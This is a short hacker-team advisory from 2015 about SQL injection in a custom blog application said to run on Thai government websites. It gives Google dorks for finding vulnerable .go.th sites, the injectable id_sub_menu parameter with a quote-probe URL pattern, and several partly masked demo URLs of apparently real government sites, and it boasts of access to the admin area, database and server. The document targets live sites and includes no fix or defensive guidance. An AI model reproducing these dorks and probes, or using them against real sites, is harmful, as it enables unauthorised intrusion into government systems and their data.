=========================================================
[+] Title :- Thailand Gov Custom Blog WebApp SQL Injection
[+] Date :- 1 - June - 2015
[+] Exploit Author :- Shelesh Rauthan (ShOrTy420 aKa SEB@sTiaN)
[+] Team name :- Team Alastor Breeze
[+] The official Members :- Sh0rTy420, P@rL0u$, !nfIn!Ty, Th3G0v3Rn3R
[+] Greedz to :- @@lu, Lalit, MyLappy:3, Diksha
[+] Facebook :- fb.com/shelesh.rauthan
[+] Gmail.com :- indian.1337.hacker@gmail.com
=========================================================
[+] Dork site:go.th inurl:"id_sub_menu="
site:th inurl:"id_sub_menu="
=========================================================
[+] About :- Thailand government authority running an custom blog web application on major websites which is vulnerable to SQL injection!
SQL Vulnerable component Link : /home/ABC/domains/DOMAIN.go.th/public_html/core_main/module/web/blog/blog.php
=========================================================
[+] DisCription :-
Google search from the above given google Dorks, open any site from the given result having "web/blog&id_sub_menu=" present in url
Note:- Replace "&namemenu=" parameter from the end of url
SQL Vulnerable Link: "DOMAIN.go.th/XXX/index.php?mod=blog&path=web/blog&id_sub_menu=102%27"
[+] Demo :-
http://www.sXXXa.mXX.go.th/sappha/index.php?mod=blog&path=web/blog&id_sub_menu=102%27
http://www.seXXX9.go.th/web/spm19/index.php?mod=blog&path=web/blog&id_sub_menu=59%27
http://www.XXea6.go.th/cma/index.php?mod=blog&path=web/blog&id_sub_menu=45%27
http://thiXc.th/index.php?mod=blog&path=web/blog&id_sub_menu=48%27
=========================================================
Severity Level: [+] High
Request Method(s): [+] GET / POST
Vulnerable Parameter(s): [+] id_sub_menu, blog
Affected Area(s): [+] Entire admin, database, Server
===========================================================